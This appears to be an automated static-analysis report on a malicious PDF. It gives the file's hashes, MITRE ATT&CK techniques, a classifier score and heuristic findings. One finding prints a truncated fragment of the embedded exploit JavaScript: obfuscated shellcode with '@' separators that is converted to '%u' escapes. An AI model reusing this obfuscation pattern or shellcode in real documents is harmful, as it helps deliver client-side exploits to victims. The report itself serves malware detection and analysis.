Malicious PDF — malware analysis report

Static analysis result for SHA-256 86581e9c31ca12c3…

MALICIOUS

PDF

481.5 KB Created: 2010-04-29 12:20:06 +08:00 Authoring application: WPS Office 个人版 (via PDFlib 7.0.3 (C++/Win32)) First seen: 2026-05-10
MD5: 8e4d5834354c8fd012fcadc2093c0f26 SHA-1: 6271cb759e49dafb0350e9123b9db9bbd061e5c0 SHA-256: 86581e9c31ca12c3de8ed3f1e2c8e7308a4061e9a9d53a331f3ed4bedf0d0501
114 Risk Score

Malware Insights

MITRE ATT&CK
T1059.007 JavaScript T1203 Exploitation for Client Execution T1566.001 Spearphishing Attachment

The sample is a PDF file that contains embedded JavaScript, flagged by multiple heuristics as an exploit cluster. The JavaScript is likely used to download and execute a second-stage payload, a common technique for malware delivery. The ML classifier strongly indicates maliciousness.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9977

Heuristics 3

  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
    var forme1 = "@2deb@8358@04c0@c933@088b@9090@3390@33f6@8bff@83f0@0cc6@fe8b@3366@66d2@168b@d632@1788@c683@8302@01c7@e983@e301@eb17@e8e9@ffce@ffff@9090@9090@632e@0001@9090@9090@9090@9090@e8bd@048f@9874@3bba@917d@bdbd@030b@7070@5e5e@c5a1@54f5@5a6a@b8b8@4848@4e4e@a229@7434@9894@eb60@3e4e@a9b5@be13@e863@0747@6a62@028b@83c6@28d4@a922@f828@7df6@c082@437f@e962@fca0@6a68@265e@999a@fd27@e26b@0558@877f@e66d@3279@5d45@a62d@f4af@98b8@c2c1@e63c@3871@b73c@2a1e@0a81@4e4d@2356@5aa6@5de5@edaa@89ec@d3a7@a2f2@122b@ …
var asT = String.fromCharCode(37,117);
var forme2 = forme1.replace(/@/g,asT);
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
font_00_sfnt_off00001861.bin pdf-font-stream PDF embedded font (sfnt) at offset 0x1861 51772 bytes
SHA-256: 175b09ff66440d54002858d1d9eb8bb658989ccbea100b745c9d92394f025231

Open this report in the interactive analyzer, or submit your own file for analysis.